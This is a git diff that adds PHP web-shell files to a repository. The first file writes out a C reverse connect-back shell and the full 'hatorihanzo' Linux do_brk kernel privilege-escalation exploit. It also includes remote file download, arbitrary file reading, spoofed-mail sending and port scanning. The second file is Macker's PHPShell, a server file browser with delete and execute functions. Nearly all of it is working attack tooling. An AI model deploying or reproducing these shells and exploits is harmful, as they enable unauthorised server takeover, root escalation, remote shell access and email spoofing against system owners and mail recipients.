+             "    }\n" .
+             "  }\n" .
+             "  printf(\"[*] Resolving Host Name\\n\");\n" .
+             "  he = gethostbyname(host);\n" .
+             "  if (he) {\n" .
+             "    memcpy(&ia.s_addr, he->h_addr, 4);\n" .
+             "  } else if ((ia.s_addr = inet_addr(host)) == INADDR_ANY) {\n" .
+             "    printf(\"[-] Unable to Resolve: %s\\n\", host);\n" .
+             "    return 1;\n" .
+             "  }\n" .
+             "  sin.sin_family = PF_INET;\n" .
+             "  sin.sin_addr.s_addr = ia.s_addr;\n" .
+             "  sin.sin_port = htons(port);\n" .
+             "  printf(\"[*] Connecting...\\n\");\n" .
+             "  if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {\n" .
+             "    printf(\"[-] Socket Error\\n\");\n" .
+             "    return 1;\n" .
+             "  }\n" .
+             "  if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) != 0) {\n" .
+             "    printf(\"[-] Unable to Connect\\n\");\n" .
+             "    return 1;\n" .
+             "  }\n" .
+             "  printf(\"[*] Spawning Shell\\n\");\n" .
+             "  f = fork( );\n" .
+             "  if (f < 0) {\n" .
+             "    printf(\"[-] Unable to Fork\\n\");\n" .
+             "    return 1;\n" .
+             "  } else if (!f) {\n" .
+             "    write(sock, msg, sizeof(msg));\n" .
+             "    dup2(sock, 0);\n" .
+             "    dup2(sock, 1);\n" .
+             "    dup2(sock, 2);\n" .
+             "    execl(\"/bin/sh\", \"shell\", NULL);\n" .
+             "    close(sock);\n" .
+             "    return 0;\n" .
+             "  }\n" .
+             "  printf(\"[*] Detached\\n\\n\");\n" .
+             "  return 0;\n" .
+             "}\n";
+
+    $fp = fopen("/tmp/dc-connectback.c", "w");
+    $ok = fwrite($fp, $shell);
+
+    if (!empty($ok)) {
+      echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[*] Connect Back Shell Was Successfuly Copied</DIV>";
+    } else {
+      echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[-] An Error Has Ocurred While Copying Shell</DIV>";
+    }
+  }
+
+  if ($kernel == "write") {
+    $kernel = "/*\n" .
+              " * hatorihanzo.c\n" .
+              " * Linux kernel do_brk vma overflow exploit.\n" .
+              " *\n" .
+              " * The bug was found by Paul (IhaQueR) Starzetz <paul@isec.pl>\n" .
+              " *\n" .
+              " * Further research and exploit development by\n" .
+              " * Wojciech Purczynski <cliph@isec.pl> and Paul Starzetz.\n" .
+              " *\n" .
+              " * (c) 2003 Copyright by IhaQueR and cliph. All Rights Reserved.\n" .
+              " *\n" .
+              " * COPYING, PRINTING, DISTRIBUTION, MODIFICATION, COMPILATION AND ANY USE\n" .
+              " * OF PRESENTED CODE IS STRICTLY PROHIBITED.\n" .
+              "*/\n" .
+              "#define _GNU_SOURCE\n" .
+              "#include <stdio.h>\n" .
+              "#include <stdlib.h>\n" .
+              "#include <errno.h>\n" .
+              "#include <string.h>\n" .
+              "#include <unistd.h>\n" .
+              "#include <fcntl.h>\n" .
+              "#include <signal.h>\n" .
+              "#include <paths.h>\n" .
+              "#include <grp.h>\n" .
+              "#include <setjmp.h>\n" .
+              "#include <stdint.h>\n" .
+              "#include <sys/mman.h>\n" .
+              "#include <sys/ipc.h>\n" .
+              "#include <sys/shm.h>\n" .
+              "#include <sys/ucontext.h>\n" .
+              "#include <sys/wait.h>\n" .
+              "#include <asm/ldt.h>\n" .
+              "#include <asm/page.h>\n" .
+              "#include <asm/segment.h>\n" .
+              "#include <linux/unistd.h>\n" .
+              "#include <linux/linkage.h>\n" .
+              "#define kB   * 1024\n" .
+              "#define MB   * 1024 kB\n" .
+              "#define GB   * 1024 MB\n" .
+              "#define MAGIC             0xdefaced /* I should've patented this number -cliph */\n" .
+              "#define ENTRY_MAGIC 0\n" .
+              "#define ENTRY_GATE 2\n" .
+              "#define ENTRY_CS    4\n" .
+              "#define ENTRY_DS    6\n" .
+              "#define CS          ((ENTRY_CS << 2) | 4)\n" .
+              "#define DS          ((ENTRY_DS << 2) | 4)\n" .
+              "#define GATE        ((ENTRY_GATE << 2) | 4 | 3)\n" .
+              "#define LDT_PAGES   ((LDT_ENTRIES*LDT_ENTRY_SIZE+PAGE_SIZE-1) / PAGE_SIZE)\n" .
+              "#define TOP_ADDR    0xFFFFE000U\n" .
+              "/* configuration */\n" .
+              "unsigned     task_size;\n" .
+              "unsigned     page;\n" .
+              "uid_t        uid;\n" .
+              "unsigned     address;\n" .
+              "int dontexit = 0;\n" .
+              "void fatal(char * msg)\n" .
+              "{\n" .
+              "      fprintf(stderr, \"[-] %s: %s\\n\", msg, strerror(errno));\n" .
+              "      if (dontexit) {\n" .
+              "             fprintf(stderr, \"[-] Unable to exit, entering neverending loop.\\n\");\n" .
+              "             kill(getpid(), SIGSTOP);\n" .
+              "             for (;;) pause();\n" .
+              "      }\n" .
+              "      exit(EXIT_FAILURE);\n" .
+              "}\n" .
+              "void configure(void)\n" .
+              "{\n" .
+              "      unsigned val;\n" .
+              "      task_size = ((unsigned)&val + 1 GB ) / (1 GB) * 1 GB;\n" .
+              "      uid = getuid();\n" .
+              "}\n" .
+              "void expand(void)\n" .
+              "{\n" .
+              "      unsigned top = (unsigned) sbrk(0);\n" .
+              "      unsigned limit = address + PAGE_SIZE;\n" .
+              "      do {\n" .
+              "             if (sbrk(PAGE_SIZE) == NULL)\n" .
+              "                   fatal(\"Kernel seems not to be vulnerable\");\n" .
+              "             dontexit = 1;\n" .
+              "             top += PAGE_SIZE;\n" .
+              "      } while (top < limit);\n" .
+              "}\n" .
+              "jmp_buf jmp;\n" .
+              "#define MAP_NOPAGE 1\n" .
+              "#define MAP_ISPAGE 2\n" .
+              "void sigsegv(int signo, siginfo_t * si, void * ptr)\n" .
+              "{\n" .
+              "      struct ucontext * uc = (struct ucontext *) ptr;\n" .
+              "      int error_code = uc->uc_mcontext.gregs[REG_ERR];\n" .
+              "      (void)signo;\n" .
+              "      (void)si;\n" .
+              "      error_code = MAP_NOPAGE + (error_code & 1);\n" .
+              "      longjmp(jmp, error_code);\n" .
+              "}\n" .
+              "void prepare(void)\n" .
+              "{\n" .
+              "      struct sigaction sa;\n" .
+              "      sa.sa_sigaction = sigsegv;\n" .
+              "      sa.sa_flags = SA_SIGINFO | SA_NOMASK;\n" .
+              "      sigemptyset(&sa.sa_mask);\n" .
+              "      sigaction(SIGSEGV, &sa, NULL);\n" .
+              "}\n" .
+              "int testaddr(unsigned addr)\n" .
+              "{\n" .
+              "      int val;\n" .
+              "      val = setjmp(jmp);\n" .
+              "      if (val == 0) {\n" .
+              "             asm (\"verr (%%eax)\" : : \"a\" (addr));\n" .
+              "             return MAP_ISPAGE;\n" .
+              "      }\n" .
+              "      return val;\n" .
+              "}\n" .
+              "#define map_pages (((TOP_ADDR - task_size) + PAGE_SIZE - 1) / PAGE_SIZE)\n" .
+              "#define map_size (map_pages + 8*sizeof(unsigned) - 1) / (8*sizeof(unsigned))\n" .
+              "#define next(u, b) do { if ((b = 2*b) == 0) { b = 1; u++; } } while(0)\n" .
+              "void map(unsigned * map)\n" .
+              "{\n" .
+              "      unsigned addr = task_size;\n" .
+              "      unsigned bit = 1;\n" .
+              "      prepare();\n" .
+              "      while (addr < TOP_ADDR) {\n" .
+              "             if (testaddr(addr) == MAP_ISPAGE)\n" .
+              "                   *map |= bit;\n" .
+              "             addr += PAGE_SIZE;\n" .
+              "             next(map, bit);\n" .
+              "      }\n" .
+              "      signal(SIGSEGV, SIG_DFL);\n" .
+              "}\n" .
+              "void find(unsigned * m)\n" .
+              "{\n" .
+              "      unsigned addr = task_size;\n" .
+              "      unsigned bit = 1;\n" .
+              "      unsigned count;\n" .
+              "      unsigned tmp;\n" .
+              "      prepare();\n" .
+              "      tmp = address = count = 0U;\n" .
+              "      while (addr < TOP_ADDR) {\n" .
+              "             int val = testaddr(addr);\n" .
+              "             if (val == MAP_ISPAGE && (*m & bit) == 0) {\n" .
+              "                   if (!tmp) tmp = addr;\n" .
+              "                   count++;\n" .
+              "             } else {\n" .
+              "                   if (tmp && count == LDT_PAGES) {\n" .
+              "                          errno = EAGAIN;\n" .
+              "                          if (address)\n" .
+              "                                fatal(\"double allocation\\n\");\n" .
+              "                          address = tmp;\n" .
+              "                   }\n" .
+              "                   tmp = count = 0U;\n" .
+              "             }\n" .
+              "             addr += PAGE_SIZE;\n" .
+              "             next(m, bit);\n" .
+              "      }\n" .
+              "      signal(SIGSEGV, SIG_DFL);\n" .
+              "      if (address)\n" .
+              "             return;\n" .
+              "      errno = ENOTSUP;\n" .
+              "      fatal(\"Unable to determine kernel address\");\n" .
+              "}\n" .
+              "int modify_ldt(int, void *, unsigned);\n" .
+              "void ldt(unsigned * m)\n" .
+              "{\n" .
+              "      struct modify_ldt_ldt_s l;\n" .
+              "      map(m);\n" .
+              "      memset(&l, 0, sizeof(l));\n" .
+              "      l.entry_number = LDT_ENTRIES - 1;\n" .
+              "      l.seg_32bit = 1;\n" .
+              "      l.base_addr = MAGIC >> 16;\n" .
+              "      l.limit = MAGIC & 0xffff;\n" .
+              "      if (modify_ldt(1, &l, sizeof(l)) == -1)\n" .
+              "             fatal(\"Unable to set up LDT\");\n" .
+              "      l.entry_number = ENTRY_MAGIC / 2;\n" .
+              "      if (modify_ldt(1, &l, sizeof(l)) == -1)\n" .
+              "             fatal(\"Unable to set up LDT\");\n" .
+              "      find(m);\n" .
+              "}\n" .
+              "asmlinkage void kernel(unsigned * task)\n" .
+              "{\n" .
+              "      unsigned * addr = task;\n" .
+              "      /* looking for uids */\n" .
+              "      while (addr[0] != uid || addr[1] != uid ||\n" .
+              "             addr[2] != uid || addr[3] != uid)\n" .
+              "             addr++;\n" .
+              "      addr[0] = addr[1] = addr[2] = addr[3] = 0;    /* uids */\n" .
+              "      addr[4] = addr[5] = addr[6] = addr[7] = 0;    /* uids */\n" .
+              "      addr[8] = 0;\n" .
+              "      /* looking for vma */\n" .
+              "      for (addr = (unsigned *) task_size; addr; addr++) {\n" .
+              "             if (addr[0] >= task_size && addr[1] < task_size &&\n" .
+              "                 addr[2] == address && addr[3] >= task_size) {\n" .
+              "                   addr[2] = task_size - PAGE_SIZE;\n" .
+              "                   addr = (unsigned *) addr[3];\n" .
+              "                   addr[1] = task_size - PAGE_SIZE;\n" .
+              "                   addr[2] = task_size;\n" .
+              "                   break;\n" .
+              "             }\n" .
+              "      }\n" .
+              "}\n" .
+              "void kcode(void);\n" .
+              "#define __str(s) #s\n" .
+              "#define str(s) __str(s)\n" .
+              "void __kcode(void)\n" .
+              "{\n" .
+              "      asm(\n" .
+              "             \"kcode:                                \\n\"\n" .
+              "             \"     pusha                            \\n\"\n" .
+              "             \"     pushl %es                        \\n\"\n" .
+              "             \"     pushl %ds                        \\n\"\n" .
+              "             \"     movl   $(\" str(DS) \") ,%edx      \\n\"\n" .
+              "             \"     movl   %edx,%es                  \\n\"\n" .
+              "             \"     movl   %edx,%ds                  \\n\"\n" .
+              "             \"     movl   $0xffffe000,%eax          \\n\"\n" .
+              "             \"     andl   %esp,%eax                 \\n\"\n" .
+              "             \"     pushl %eax                       \\n\"\n" .
+              "             \"     call   kernel                    \\n\"\n" .
+              "             \"     addl   $4, %esp                  \\n\"\n" .
+              "             \"     popl   %ds                       \\n\"\n" .
+              "             \"     popl   %es                       \\n\"\n" .
+              "             \"     popa                             \\n\"\n" .
+              "             \"     lret                             \\n\"\n" .
+              "      );\n" .
+              "}\n" .
+              "void knockout(void)\n" .
+              "{\n" .
+              "      unsigned * addr = (unsigned *) address;\n" .
+              "      if (mprotect(addr, PAGE_SIZE, PROT_READ|PROT_WRITE) == -1)\n" .
+              "             fatal(\"Unable to change page protection\");\n" .
+              "      errno = ESRCH;\n" .
+              "      if (addr[ENTRY_MAGIC] != MAGIC)\n" .
+              "             fatal(\"Invalid LDT entry\");\n" .
+              "      /* setting call gate and privileged descriptors */\n" .
+              "      addr[ENTRY_GATE+0] = ((unsigned)CS << 16) | ((unsigned)kcode & 0xffffU);\n" .
+              "      addr[ENTRY_GATE+1] = ((unsigned)kcode & ~0xffffU) | 0xec00U;\n" .
+              "      addr[ENTRY_CS+0] = 0x0000ffffU; /* kernel 4GB code at 0x00000000 */\n" .
+              "      addr[ENTRY_CS+1] = 0x00cf9a00U;\n" .
+              "      addr[ENTRY_DS+0] = 0x0000ffffU; /* user   4GB code at 0x00000000 */\n" .
+              "      addr[ENTRY_DS+1] = 0x00cf9200U;\n" .
+              "      prepare();\n" .
+              "      if (setjmp(jmp) != 0) {\n" .
+              "             errno = ENOEXEC;\n" .
+              "             fatal(\"Unable to jump to call gate\");\n" .
+              "      }\n" .
+              "      asm(\"lcall $\" str(GATE) \",$0x0\");      /* this is it */\n" .
+              "}\n" .
+              "void shell(void)\n" .
+              "{\n" .
+              "      char * argv[] = { _PATH_BSHELL, NULL };\n" .
+              "      execve(_PATH_BSHELL, argv, environ);\n" .
+              "      fatal(\"Unable to spawn shell\\n\");\n" .
+              "}\n" .
+              "void remap(void)\n" .
+              "{\n" .
+              "      static char stack[8 MB];  /* new stack */\n" .
+              "      static char * envp[] = { \"PATH=\" _PATH_STDPATH, NULL };\n" .
+              "      static unsigned * m;\n" .
+              "      static unsigned b;\n" .
+              "      m = (unsigned *) sbrk(map_size);\n" .
+              "      if (!m)\n" .
+              "             fatal(\"Unable to allocate memory\");\n" .
+              "      environ = envp;\n" .
+              "      asm (\"movl %0, %%esp\\n\" : : \"a\" (stack + sizeof(stack)));\n" .
+              "      b = ((unsigned)sbrk(0) + PAGE_SIZE - 1) & PAGE_MASK;\n" .
+              "      if (munmap((void*)b, task_size - b) == -1)\n" .
+              "             fatal(\"Unable to unmap stack\");\n" .
+              "      while (b < task_size) {\n" .
+              "             if (sbrk(PAGE_SIZE) == NULL)\n" .
+              "                   fatal(\"Unable to expand BSS\");\n" .
+              "             b += PAGE_SIZE;\n" .
+              "      }\n" .
+              "      ldt(m);\n" .
+              "      expand();\n" .
+              "      knockout();\n" .
+              "      shell();\n" .
+              "}\n" .
+              "int main(void)\n" .
+              "{\n" .
+              "      configure();\n" .
+              "      remap();\n" .
+              "      return EXIT_FAILURE;\n" .
+              "}\n";
+
+    $fp = fopen("/tmp/xpl_brk.c", "w");
+    $ok = fwrite($fp, $kernel);
+    
+    if (!empty($ok)) {
+      echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[*] Linux Local Kernel Exploit Was Successfuly Copied</DIV>";
+    } else {
+      echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[-] An Error Has Ocurred While Copying Kernel Exploit</DIV>";
+    }
+  }
+
+?>
+</CENTER>
+<pre><font face="Tahoma" size="2">
+<?php
+
+// Function to Visualize Source Code files 
+if ($see != "") {
+  $fp = fopen($see, "r"); 
+  $read = fread($fp, 30000); 
+  echo "============== $see ================<br>";
+  echo "<textarea name=textarea cols=80 rows=15>"; 
+  echo "$read"; 
+  Echo "</textarea>"; 
+}
+
+// Function to Dowload Local Xploite Binary COde or Source Code
+
+if ($dx != "") {
+  $fp = @fopen("$hostxpl",r);
+  $fp2 = @fopen("$storage","w");
+  fwrite($fp2, "");
+  $fp1 = @fopen("$storage","a+");
+  for (;;) {
+    $read = @fread($fp, 4096);
+    if (empty($read)) break;
+    $ok = fwrite($fp1, $read);
+    
+    if (empty($ok)) {
+      echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[-] An Error Has Ocurred While Uploading File</DIV>";
+      break;
+    }
+  }
+
+  if (!empty($ok)) {
+    echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[*] File Was Successfuly Uploaded</DIV>";
+  }
+}
+
+flush( );
+
+// Function to visulize Format Color Source Code PHP
+
+if ($sfc != "") {
+  $showcode = show_source("$sfc");
+  echo "<font size=4> $showcode </font>";
+}
+
+// Function to Visualize all infomation files
+if ($fileinfo != "") {
+  $infofile = stat("$fileanalize");
+  while (list($info, $value) = each ($infofile)) {
+    echo" Info: $info  Value: $value <br>";
+  }
+}
+
+// Function to send fake mail
+if ($fake == 1) {
+  echo "<FORM METHOD=POST ACTION=\"$SCRIPT_NAME?$QUERY_STRING&send=1\">";
+  echo "Your Fake Mail <INPUT TYPE=\"\" NAME=\"yourmail\"><br>";
+  echo "Your Cavy:<INPUT TYPE=\"\" NAME=\"cavy\"><br>";
+  echo "Suject: <INPUT TYPE=\"text\" NAME=\"subject\"><br>";
+  echo "Text: <TEXTAREA NAME=\"body\" ROWS=\"\" COLS=\"\"></TEXTAREA><br>";
+  echo "<INPUT TYPE=\"hidden\" NAME=\"send\" VALUE=\"1\"><br>";
+  echo "<INPUT TYPE=\"submit\" VALUE=\"Send Fake Mail\">";
+  echo "</FORM>";
+}
+
+if($send == 1) {
+  if (mail($cavy, $subject, $body, "From: $yourmail\r\n")) {
+    echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[*] Mail Send Sucessfuly</DIV>";
+  } else {
+    echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[-] An Error Has Ocurred While Sending Mail</DIV>";
+  }
+}
+
+if ($portscan != "") {
+  $port = array ("21","22","23","25","110",);
+  $values = count($port);
+  for ($cont=0; $cont < $values; $cont++) {
+    @$sock[$cont] = Fsockopen($SERVER_NAME, $port[$cont], $oi, $oi2, 1);
+    $service = Getservbyport($port[$cont],"tcp");
+    @$get = fgets($sock[$cont]);
+    echo "<br>Port: $port[$cont] - Service: $service<br><br>";
+    echo "<br>Banner: $get <br><br>";
+    flush();
+  }
+}
+
+?> 
+</font></pre>
\ No newline at end of file
diff --git a/php/PHP Shell.php b/php/PHP Shell.php
new file mode 100644
index 0000000..0b1f12b
--- /dev/null
+++ b/php/PHP Shell.php	
@@ -0,0 +1,1010 @@
+<?php 
+
+/*
+*****************************************************************************************
+*                           PHPSHELL.PHP  BY MACKER     August 28th 2003                *
+***************************************************************************************** 
+*                                                                                       *  
+*   Welcome to Macker's PHPShell script...                                              * 
+*   This script will allow you to browse webservers etc...                              * 
+*   Just copy the file to your directory and open it in your Internet Browser.          * 
+*                                                                                       * 
+*   The webserver should support PHP...                                                 * 
+*                                                                                       * 
+*   You can modify the script if you want, but please send me a copy to:                *  
+*                               DRAZZ01@HOTMAIL.COM                                     * 
+***************************************************************************************** 
+
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 
+!!   PLEASE NOTE: You should use this script at own risk, it should do damage to the   !! 
+!!                Sites or even the server... You are responsible for your own deeds.  !! 
+!!                The admin of your webserver should always know you are using this    !!
+!!                script.                                                              !! 
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 
+*/ 
+
+
+/*Setting some envirionment variables...*/ 
+
+/* I added this to ensure the script will run correctly...
+   Please enter the Script's filename in this variable. */   
+$SFileName=$PHP_SELF;
+
+/* uncomment the two following variables if you want to use http
+   authentication. This will password protect your PHPShell */
+//$http_auth_user = "phpshell";	/* HTTP Authorisation username, uncomment if you want to use this */
+//$http_auth_pass = "phpshell";	/* HTTP Authorisation password, uncomment if you want to use this */	    
+
+error_reporting(0);
+$PHPVer=phpversion();
+$isGoodver=(intval($PHPVer[0])>=4);
+$scriptTitle = "PHPShell";
+$scriptident = "$scriptTitle by Macker";
+
+$urlAdd = "";
+$formAdd = "";
+
+function walkArray($array){
+  while (list($key, $data) = each($array))
+    if (is_array($data)) { walkArray($data); }
+    else { global $$key; $$key = $data; global $urlAdd; $urlAdd .= "$key=".urlencode($data)."&";}
+}
+
+if (isset($_PUT)) walkArray($_PUT);
+if (isset($_GET)) walkArray($_GET);
+if (isset($_POST)) walkArray($_POST);
+
+
+$pos = strpos($urlAdd, "s=r");
+if (strval($pos) != "") {
+$urlAdd= substr($urlAdd, 0, $pos);
+}
+
+$urlAdd .= "&s=r&";
+
+if (empty($Pmax))
+	$Pmax = 125;   /* Identifies the max amount of Directories and files listed on one page */
+if (empty($Pidx)) 
+	$Pidx = 0;
+
+$dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir )));
+$file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file )));
+
+$scriptdate = "August 28th 2003";
+$scriptver = "Version 2.6.6dev";
+$LOCAL_IMAGE_DIR = "img";
+$REMOTE_IMAGE_URL = "img";
+$img = array(
+				"Edit" 		=> "edit.gif",
+				"Download" 	=> "download.gif",
+				"Upload" 	=> "upload.gif",
+				"Delete" 	=> "delete.gif",
+				"View" 		=> "view.gif",
+				"Rename" 	=> "rename.gif",
+				"Move" 		=> "move.gif",
+				"Copy" 		=> "copy.gif",
+				"Execute" 	=> "exec.gif"
+            );
+
+while (list($id, $im)=each($img))
+	if (file_exists("$LOCAL_IMAGE_DIR/$im"))
+		$img[$id] = "<img height=\"16\" width=\"16\" border=\"0\" src=\"$REMOTE_IMAGE_URL/$im\" alt=\"$id\">";
+	else
+ 		$img[$id] = "[$id]";
+
+
+
+
+/* HTTP AUTHENTICATION */
+
+    if  ( ( (isset($http_auth_user) ) && (isset($http_auth_pass)) ) && ( !isset($PHP_AUTH_USER) || $PHP_AUTH_USER != $http_auth_user || $PHP_AUTH_PW != $http_auth_pass)  ||  (($logoff==1) && $noauth=="yes")  )   { 
+	    setcookie("noauth","");
+	    Header( "WWW-authenticate:  Basic realm=\"$scriptTitle $scriptver\"");
+	    Header( "HTTP/1.0  401  Unauthorized");
+	    echo "Your username or password is incorrect";
+	    exit ;
+			     
+    } 
+
+function buildUrl($display, $url) {
+        global $urlAdd;
+        $url = $SFileName . "?$urlAdd$url";
+	return "<a href=\"$url\">$display</a>";
+}
+
+function sp($mp) {
+	for ( $i = 0; $i < $mp; $i++ )
+		$ret .= "&nbsp;";
+	return $ret;
+}
+
+function spacetonbsp($instr) { return str_replace(" ", "&nbsp;", $instr);  } 
+
+function Mydeldir($Fdir) {
+	if (is_dir($Fdir)) {
+		$Fh=@opendir($Fdir);
+ 		while ($Fbuf = readdir($Fh))
+ 			if (($Fbuf != ".") && ($Fbuf != ".."))
+				Mydeldir("$Fdir/$Fbuf");
+		@closedir($Fh);
+				return rmdir($Fdir);
+	}	else {
+		return unlink($Fdir);
+	}
+}
+
+
+function arrval ($array) {
+list($key, $data) = $array;
+return $data;
+}
+
+function formatsize($insize) {  
+	$size = $insize;
+	$add = "B";
+	if ($size > 1024) {
+ 		$size = intval(intval($size) / 1.024)/1000;
+ 		$add = "KB";
+ 	}
+ 	if ($size > 1024) {
+ 		$size = intval(intval($size) / 1.024)/1000;
+ 		$add = "MB";
+ 	}
+ 	if ($size > 1024) {
+ 		$size = intval(intval($size) / 1.024)/1000;
+ 		$add = "GB";
+ 	}
+ 	if ($size > 1024) {
+ 		$size = intval(intval($size) / 1.024)/1000;
+ 		$add = "TB";
+ 	}
+ 	return "$size $add";
+}
+
+if ($cmd != "downl") {
+	?>
+
+<!-- <?php echo $scriptident ?>, <?php echo $scriptver ?>, <?php echo $scriptdate ?>  -->
+<HTML>
+ <HEAD>
+  <STYLE>
+  <!--
+    A{ text-decoration:none; color:navy; font-size: 12px }
+    body { font-size: 12px; 
+           font-family: arial, helvetica;
+            scrollbar-width: 5;
+            scrollbar-height: 5;
+            scrollbar-face-color: white;
+            scrollbar-shadow-color: silver;
+            scrollbar-highlight-color: white;
+            scrollbar-3dlight-color:silver;
+            scrollbar-darkshadow-color: silver;
+            scrollbar-track-color: white;
+            scrollbar-arrow-color: black;
+    }
+    Table { font-size: 12px; }
+    TR{ font-size: 12px; }
+    TD{ font-size: 12px; 
+        font-family: arial, helvetical;
+        BORDER-LEFT: black 0px solid; 
+	BORDER-RIGHT: black 0px solid; 
+	BORDER-TOP: black 0px solid; 
+	BORDER-BOTTOM: black 0px solid; 
+	COLOR: black; 
+    }
+    .border{       BORDER-LEFT: black 1px solid;
+ 		   BORDER-RIGHT: black 1px solid;
+ 		   BORDER-TOP: black 1px solid;
+ 		   BORDER-BOTTOM: black 1px solid;
+ 		 }
+    .none  {       BORDER-LEFT: black 0px solid;
+ 		   BORDER-RIGHT: black 0px solid;
+ 		   BORDER-TOP: black 0px solid;
+ 		   BORDER-BOTTOM: black 0px solid;
+ 		 }
+    .inputtext {
+		    background-color: #EFEFEF;
+		    font-family: arial, helvetica;
+		    border: 1px solid #000000;
+		    height: 20;
+    }
+    .lighttd {       background: #F8F8F8;
+    }
+    .darktd {        background: #E8E8E8;
+    }
+    input { font-family: arial, helvetica;
+    }
+    .inputbutton {
+                        background-color: silver;
+			border: 1px solid #000000;
+			border-width: 1px;
+			height: 20;
+    }
+    .inputtextarea {
+		    background-color: #EFEFEF;
+		    border: 1px solid #000000;
+		    scrollbar-width: 5;
+		    scrollbar-height: 5;
+		    scrollbar-face-color: #EFEFEF;
+		    scrollbar-shadow-color: silver;
+		    scrollbar-highlight-color: #EFEFEF;
+		    scrollbar-3dlight-color:silver;
+		    scrollbar-darkshadow-color: silver;
+		    scrollbar-track-color: #EFEFEF;
+		    scrollbar-arrow-color: black;
+    }
+    .top { BORDER-TOP: black 1px solid; }
+    .textin { BORDER-LEFT: silver 1px solid;
+              BORDER-RIGHT: silver 1px solid;
+ 	      BORDER-TOP: silver 1px solid;
+              BORDER-BOTTOM: silver 1px solid;
+              width: 99%; font-size: 12px; font-weight: bold; color: navy;
+            }
+    .notop { BORDER-TOP: black 0px solid; }
+    .bottom { BORDER-BOTTOM: black 1px solid; }
+    .nobottom { BORDER-BOTTOM: black 0px solid; }
+    .left { BORDER-LEFT: black 1px solid; }
+    .noleft { BORDER-LEFT: black 0px solid; }
+    .right { BORDER-RIGHT: black 1px solid; }
+    .noright { BORDER-RIGHT: black 0px solid; }
+    .silver{ BACKGROUND: silver; }
+  -->
+  </STYLE>
+  <TITLE><?php echo $SFileName ?></TITLE>
+ </HEAD>
+ <body topmargin="0" leftmargin="0">
+ <div style="position: absolute; background: white; z-order:10000; top:0; left:0; width: 100%; height: 100%;">
+ <table width=100% height="100%" NOWRAP border="0">
+  <tr NOWRAP>
+   <td width="100%" NOWRAP>
+    <table NOWRAP width=100% border="0" cellpadding="0" cellspacing="0">
+     <tr>
+      <td width="100%" class="silver border">
+       <center>
+	    <strong>
+		 <font size=3><?php echo $scriptident ?> - <?php echo $scriptver ?> - <?php echo $scriptdate ?></font>
+            </strong>
+       </center>
+      </td>
+     </tr>
+    </table><br>
+
+	<?php
+}
+
+if ( $cmd=="dir" ) {
+  	$h=@opendir($dir);
+ 	if ($h == false) {
+  		echo "<br><font color=\"red\">".sp(3)."\n\n\n\n
+                COULD NOT OPEN THIS DIRECTORY!!!<br>".sp(3)."\n
+                THE SCRIPT WILL RESULT IN AN ERROR!!!
+                <br><br>".sp(3)."\n
+                PLEASE MAKE SURE YOU'VE GOT READ PERMISSIONS TO THE DIR...
+                <br><br></font>\n\n\n\n";
+ 	}
+        if (function_exists('realpath')) {
+		$partdir = realpath($dir);
+	}
+        else {
+		$partdir = $dir;
+	}
+ 	if (strlen($partdir) >= 100) {
+ 		$partdir = substr($partdir, -100);
+ 		$pos = strpos($partdir, "/");
+ 		if (strval($pos) != "") {
+ 			$partdir = "<--   ...".substr($partdir, $pos);
+ 		}
+        $partdir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $partdir )));
+        $dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir ))); 
+	$file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file )));
+ 	}
+    ?>
+      <form name="urlform" action="<?php echo "$SFileName?$urlAdd"; ?>" method="POST"><input type="hidden" name="cmd" value="dir">
+         <table NOWRAP width="100%" border="0" cellpadding="0" cellspacing="0">
+	  <tr>
+	   <td width="100%" class="silver border">
+	    <center>&nbsp;HAXPLORER - Server Files Browser...&nbsp;</center>
+	   </td>
+	  </tr>
+	 </table>
+       <br>
+	 <table width="100%" border="0" cellpadding="0" cellspacing="0">
+	  <tr>
+           <td class="border nobottom noright">
+            &nbsp;Browsing:&nbsp;
+	  </td>
+          <td width="100%" class="border nobottom noleft">
+   	    <table width="100%" border="0" cellpadding="1" cellspacing="0">
+             <tr>
+              <td NOWRAP width="99%" align="center"><input type="text" name="dir" class="none textin" value="<?php echo $partdir ?>"></td>
+              <td NOWRAP><center>&nbsp;<a href="javascript: urlform.submit();"><b>GO<b></a>&nbsp;<center></td>
+             </tr>
+            </table>
+            
+	  </td>
+	 </tr>
+	</table>
+  <!--    </form>   -->
+        <table NOWRAP width="100%" border="0" cellpadding="0" cellspacing="0" >
+         <tr>
+	  <td width="100%" NOWRAP class="silver border">
+	   &nbsp;Filename&nbsp;
+	  </td>
+          <td NOWRAP class="silver border noleft">
+	   &nbsp;Actions&nbsp;(Attempt to perform)&nbsp;
+	  </td>
+          <td NOWRAP class="silver border noleft">
+	   &nbsp;Size&nbsp;
+	  </td>
+          <td width=1 NOWRAP class="silver border noleft">
+	   &nbsp;Attributes&nbsp;
+	  </td>
+          <td NOWRAP class="silver border noleft">
+	   &nbsp;Modification Date&nbsp;
+	  </td>
+	 <tr>
+    <?php
+
+
+      	/* <!-- This whole heap of junk is the sorting section... */
+
+ 	$dirn 	= array();
+ 	$filen 	= array();
+ 	$filesizes	= 0;
+ 	while ($buf = readdir($h)) {
+	    if (is_dir("$dir/$buf"))
+			$dirn[] = $buf;
+    		else 
+ 			$filen[] = $buf;
+    	}	 	
+		$dirno 	= count($dirn) + 1;
+ 		$fileno	= count($filen) + 1;
+
+  		function mycmp($a, $b){
+			if ($a == $b) return 0;
+			return (strtolower($a) < strtolower($b)) ? -1 : 1;
+		}
+
+		if (function_exists("usort")) {
